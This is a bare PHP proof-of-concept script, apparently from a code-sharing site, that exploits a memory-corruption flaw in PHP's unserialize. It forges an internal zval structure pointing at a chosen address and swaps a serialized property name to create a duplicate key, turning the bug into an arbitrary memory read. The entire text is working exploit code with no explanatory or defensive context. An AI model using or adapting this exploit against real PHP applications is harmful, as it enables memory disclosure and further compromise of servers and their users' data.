<?php $base = 0xb788; function ptr2str($ptr) { $out = ""; for ($i=0; $i<8; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } $zval = ptr2str($base);// zvalue_value value; /* value */ $zval .= ptr2str(0xf); $zval .= "\x00\x00\x00\x00";// zend_uint refcount__gc; //$zval .= ptr2str(0); $zval .= "\x06";// zend_uchar type; /* active type */ //$zval .= ptr2str(0x6); $zval .= "\x00";// zend_uchar is_ref__gc; $zval .= ptr2str(0); $zval .= ptr2str(0); $zval .= ptr2str(0); $zval .= 'AA'; $m = new StdClass(); $u = 'AAAA'; $m->aaa = array(1,2,&$u,4,5); $m->bbb = 1; $m->ddd = array(1,2,$zval); $m->ccc = &$u; $z = serialize($m); $z = str_replace("bbb", "aaa", $z); var_dump($z); $y = unserialize($z); var_dump($y);
You have javascript disabled. You will not be able to edit any code.